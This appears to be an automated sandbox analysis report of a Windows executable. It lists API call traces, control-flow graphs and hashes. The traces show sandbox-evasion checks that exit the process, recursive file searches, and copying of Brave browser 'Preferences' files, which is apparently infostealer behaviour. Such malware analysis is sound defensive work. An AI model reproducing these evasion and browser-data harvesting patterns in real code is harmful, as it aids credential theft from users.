                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID: ERROR
                              • API String ID: 3722407311-2861137601
                              • Opcode ID: e2cf55eae2fb167cc5617724be107cdd9acf2e0cf2d154897b83c86b331ebdc9
                              • Instruction ID: 276dfb16d16fa618ad88aba09fd0f953f4aec3c3d4d9afead865e8be33a7558b
                              • Opcode Fuzzy Hash: e2cf55eae2fb167cc5617724be107cdd9acf2e0cf2d154897b83c86b331ebdc9
                              • Instruction Fuzzy Hash: 8121DD706203459FCB21BF79E84AA9A7BE4AF10304F04656CB98AEB252DA35ED14D790
                              Function 00E310C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2886 e310c0-e310cb 2887 e310d0-e310dc 2886->2887 2889 e310de-e310f3 GlobalMemoryStatusEx 2887->2889 2890 e31112-e31114 ExitProcess 2889->2890 2891 e310f5-e31106 2889->2891 2892 e3111a-e3111d 2891->2892 2893 e31108 2891->2893 2893->2890 2894 e3110a-e31110 2893->2894 2894->2890 2894->2892
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 803317263-2766056989
                              • Opcode ID: 0527fe468e43cf78decdbdee2cde432e9d70412f05d8456ce1fdb8239904f6ea
                              • Instruction ID: f5e68fc3752ad9d238ff05dcba9cbc038aa2478ae0f049863eb9ee22fb71acf8
                              • Opcode Fuzzy Hash: 0527fe468e43cf78decdbdee2cde432e9d70412f05d8456ce1fdb8239904f6ea
                              • Instruction Fuzzy Hash: C2F05C701082448FEB146964D94E36DFFD8EB04354F2029BDEEDBD2190E230CC40C627
                              Function 00E48C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2895 e48c88-e48cc4 StrCmpCA 2897 e48cc6-e48cc7 ExitProcess 2895->2897 2898 e48ccd-e48ce6 2895->2898 2900 e48ee2-e48eef call e32a20 2898->2900 2901 e48cec-e48cf1 2898->2901 2903 e48cf6-e48cf9 2901->2903 2904 e48ec3-e48edc 2903->2904 2905 e48cff 2903->2905 2904->2900 2945 e48cf3 2904->2945 2907 e48d84-e48d92 StrCmpCA 2905->2907 2908 e48da4-e48db8 StrCmpCA 2905->2908 2909 e48d06-e48d15 lstrlen 2905->2909 2910 e48e6f-e48e7d StrCmpCA 2905->2910 2911 e48e88-e48e9a lstrlen 2905->2911 2912 e48e56-e48e64 StrCmpCA 2905->2912 2913 e48d30-e48d3f lstrlen 2905->2913 2914 e48dbd-e48dcb StrCmpCA 2905->2914 2915 e48ddd-e48deb StrCmpCA 2905->2915 2916 e48dfd-e48e0b StrCmpCA 2905->2916 2917 e48e1d-e48e2b StrCmpCA 2905->2917 2918 e48e3d-e48e4b StrCmpCA 2905->2918 2919 e48d5a-e48d69 lstrlen 2905->2919 2907->2904 2933 e48d98-e48d9f 2907->2933 2908->2904 2921 e48d17-e48d1c call e32a20 2909->2921 2922 e48d1f-e48d2b call e32930 2909->2922 2910->2904 2925 e48e7f-e48e86 2910->2925 2926 e48ea4-e48eb0 call e32930 2911->2926 2927 e48e9c-e48ea1 call e32a20 2911->2927 2912->2904 2924 e48e66-e48e6d 2912->2924 2928 e48d41-e48d46 call e32a20 2913->2928 2929 e48d49-e48d55 call e32930 2913->2929 2914->2904 2934 e48dd1-e48dd8 2914->2934 2915->2904 2935 e48df1-e48df8 2915->2935 2916->2904 2936 e48e11-e48e18 2916->2936 2917->2904 2920 e48e31-e48e38 2917->2920 2918->2904 2923 e48e4d-e48e54 2918->2923 2930 e48d73-e48d7f call e32930 2919->2930 2931 e48d6b-e48d70 call e32a20 2919->2931 2920->2904 2921->2922 2954 e48eb3-e48eb5 2922->2954 2923->2904 2924->2904 2925->2904 2926->2954 2927->2926 2928->2929 2929->2954 2930->2954 2931->2930 2933->2904 2934->2904 2935->2904 2936->2904 2945->2903 2954->2904 2955 e48eb7-e48eb9 2954->2955 2955->2904 2956 e48ebb-e48ebd lstrcpy 2955->2956 2956->2904
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 152db991df7240b0900529fc0576ee3aade21ed9df4ed1e407d98f4972a2ec6e
                              • Instruction ID: 7357aa68838e2ba13cd4bda1d4d56574a17c4048e5edb1fec6df4bae5a1ade17
                              • Opcode Fuzzy Hash: 152db991df7240b0900529fc0576ee3aade21ed9df4ed1e407d98f4972a2ec6e
                              • Instruction Fuzzy Hash: EAE0D86441C345AFDB3096B59C9ACC77B5C8F54200F400165FE404B650F534DD14C3EB
                              Function 00E3100D Relevance: 4.5, APIs: 3, Instructions: 35memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E31046
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00E3104D
                              • ExitProcess.KERNEL32 ref: 00E31058
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E3106C
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00E310AB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                              • String ID:
                              • API String ID: 3477276466-0
                              • Opcode ID: 0d86038acaf54198b8b5e7ac9dc5a2cb9d13c460bf334e8a47ec0a693dce7752
                              • Instruction ID: 0cf10ca33a4f48d2abcd337e6a32a52930235856ca9ef5f649a8fed8de62d628
                              • Opcode Fuzzy Hash: 0d86038acaf54198b8b5e7ac9dc5a2cb9d13c460bf334e8a47ec0a693dce7752
                              • Instruction Fuzzy Hash: A9E086B078C3407FFA3512615C5DF123F2C9B52B04F004055F681EA4D1D5A9A400C675

                              Non-executed Functions

                              Function 00E42390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E423D4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E423F7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E42402
                              • lstrlen.KERNEL32(\*.*), ref: 00E4240D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4242A
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 00E42436
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4246A
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00E42486
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: \*.*
                              • API String ID: 2567437900-1173974218
                              • Opcode ID: 27ce93c0a4f021994999950dacd2a495618246372a11dcde95c12f73b473f8f2
                              • Instruction ID: db2def31ad77e5d74238807ed6022c6ba4997883f887f81d8c70c2c98ba9cc8a
                              • Opcode Fuzzy Hash: 27ce93c0a4f021994999950dacd2a495618246372a11dcde95c12f73b473f8f2
                              • Instruction Fuzzy Hash: 8AA28E30A013169FDB21AF74E888AAE7BF9AF44308F44652DFA85B7255DB39DD01CB50
                              Function 00E316A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E316E2
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E31719
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3176C
                              • lstrcat.KERNEL32(00000000), ref: 00E31776
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E317A2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E317EF
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E317F9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31825
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31875
                              • lstrcat.KERNEL32(00000000), ref: 00E3187F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E318AB
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E318F3
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E318FE
                              • lstrlen.KERNEL32(00E61794), ref: 00E31909
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31929
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E31935
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3195B
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E31966
                              • lstrlen.KERNEL32(\*.*), ref: 00E31971
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3198E
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 00E3199A
                                • Part of subcall function 00E54040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 00E5406D
                                • Part of subcall function 00E54040: lstrcpy.KERNEL32(00000000,?), ref: 00E540A2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E319C3
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31A0E
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E31A16
                              • lstrlen.KERNEL32(00E61794), ref: 00E31A21
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31A41
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E31A4D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31A76
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E31A81
                              • lstrlen.KERNEL32(00E61794), ref: 00E31A8C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31AAC
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E31AB8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31ADE
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E31AE9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31B11
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00E31B45
                              • StrCmpCA.SHLWAPI(?,00E617A0), ref: 00E31B70
                              • StrCmpCA.SHLWAPI(?,00E617A4), ref: 00E31B8A
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E31BC4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31BFB
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E31C03
                              • lstrlen.KERNEL32(00E61794), ref: 00E31C0E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31C31
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E31C3D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31C69
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E31C74
                              • lstrlen.KERNEL32(00E61794), ref: 00E31C7F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31CA2
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E31CAE
                              • lstrlen.KERNEL32(?), ref: 00E31CBB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31CDB
                              • lstrcat.KERNEL32(00000000,?), ref: 00E31CE9
                              • lstrlen.KERNEL32(00E61794), ref: 00E31CF4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31D14
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E31D20
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31D46
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E31D51
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31D7D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31DE0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E31DEB
                              • lstrlen.KERNEL32(00E61794), ref: 00E31DF6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31E19
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E31E25
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31E4B
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E31E56
                              • lstrlen.KERNEL32(00E61794), ref: 00E31E61
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31E81
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E31E8D
                              • lstrlen.KERNEL32(?), ref: 00E31E9A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31EBA
                              • lstrcat.KERNEL32(00000000,?), ref: 00E31EC8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31EF4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31F3E
                              • GetFileAttributesA.KERNEL32(00000000), ref: 00E31F45
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E31F9F
                              • lstrlen.KERNEL32(00D28C08), ref: 00E31FAE
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31FDB
                              • lstrcat.KERNEL32(00000000,?), ref: 00E31FE3
                              • lstrlen.KERNEL32(00E61794), ref: 00E31FEE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3200E
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3201A
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E32042
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3204D
                              • lstrlen.KERNEL32(00E61794), ref: 00E32058
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E32075
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E32081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                              • String ID: \*.*
                              • API String ID: 4127656590-1173974218
                              • Opcode ID: 902b4e8d9a922756b22c4477e39eb3b5fcbc30599b5305d26f18fc6548220606
                              • Instruction ID: 33a1c1e8a88688d9147024d1ba3e5e6cb9340f7836b40fd2a20d5a9d8c7f67e6
                              • Opcode Fuzzy Hash: 902b4e8d9a922756b22c4477e39eb3b5fcbc30599b5305d26f18fc6548220606
                              • Instruction Fuzzy Hash: ED927E319013169FCB21AFA4D98CAAE7BF9AF40308F14616CFA85B7215DB35DD05CBA0
                              Function 00E3DB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3DBC1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DBE4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3DBEF
                              • lstrlen.KERNEL32(00E64CA8), ref: 00E3DBFA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DC17
                              • lstrcat.KERNEL32(00000000,00E64CA8), ref: 00E3DC23
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DC4C
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3DC8F
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3DCBF
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00E3DCD0
                              • StrCmpCA.SHLWAPI(?,00E617A0), ref: 00E3DCF0
                              • StrCmpCA.SHLWAPI(?,00E617A4), ref: 00E3DD0A
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E3DD1D
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3DD47
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DD70
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3DD7B
                              • lstrlen.KERNEL32(00E61794), ref: 00E3DD86
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DDA3
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3DDAF
                              • lstrlen.KERNEL32(?), ref: 00E3DDBC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DDDF
                              • lstrcat.KERNEL32(00000000,?), ref: 00E3DDED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DE19
                              • lstrlen.KERNEL32(00E61794), ref: 00E3DE3D
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3DE6F
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3DE7B
                              • lstrlen.KERNEL32(00D28AD8), ref: 00E3DE8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DEB0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3DEBB
                              • lstrlen.KERNEL32(00E61794), ref: 00E3DEC6
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3DEE6
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3DEF2
                              • lstrlen.KERNEL32(00D28BD8), ref: 00E3DF01
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DF27
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3DF32
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DF5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DFA5
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3DFB1
                              • lstrlen.KERNEL32(00D28AD8), ref: 00E3DFC0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DFE9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3DFF4
                              • lstrlen.KERNEL32(00E61794), ref: 00E3DFFF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E022
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3E02E
                              • lstrlen.KERNEL32(00D28BD8), ref: 00E3E03D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E063
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3E06E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E09A
                              • StrCmpCA.SHLWAPI(?,Brave), ref: 00E3E0CD
                              • StrCmpCA.SHLWAPI(?,Preferences), ref: 00E3E0E7
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3E11F
                              • lstrlen.KERNEL32(00D2DF58), ref: 00E3E12E
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E155
                              • lstrcat.KERNEL32(00000000,?), ref: 00E3E15D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E19F
                              • lstrcat.KERNEL32(00000000), ref: 00E3E1A9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E1D0
                              • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00E3E1F9
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3E22F
                              • lstrlen.KERNEL32(00D28C08), ref: 00E3E23D
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E261
                              • lstrcat.KERNEL32(00000000,00D28C08), ref: 00E3E269
                              • lstrlen.KERNEL32(\Brave\Preferences), ref: 00E3E274
